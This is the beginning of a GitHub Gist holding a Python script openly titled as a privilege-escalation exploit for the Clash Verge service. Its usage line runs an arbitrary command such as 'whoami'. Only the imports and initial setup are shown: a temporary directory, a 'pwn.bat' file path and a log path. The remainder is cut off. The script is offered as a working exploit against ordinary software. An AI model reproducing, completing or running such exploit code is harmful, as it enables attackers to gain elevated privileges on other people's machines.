Skip to content

Instantly share code, notes, and snippets.

@real-LiHua
real-LiHua / clash-verge-service-privilege-escalation-exp.py
Last active April 27, 2025 02:59
python clash-verge-service-privilege-escalation-exp.py whoami
from json import dumps
from os import name
from pathlib import Path
from sys import argv
from tempfile import mkdtemp
from urllib.request import Request, urlopen
temp = Path(mkdtemp())
pwn = temp / "pwn.bat"
log = temp / "log"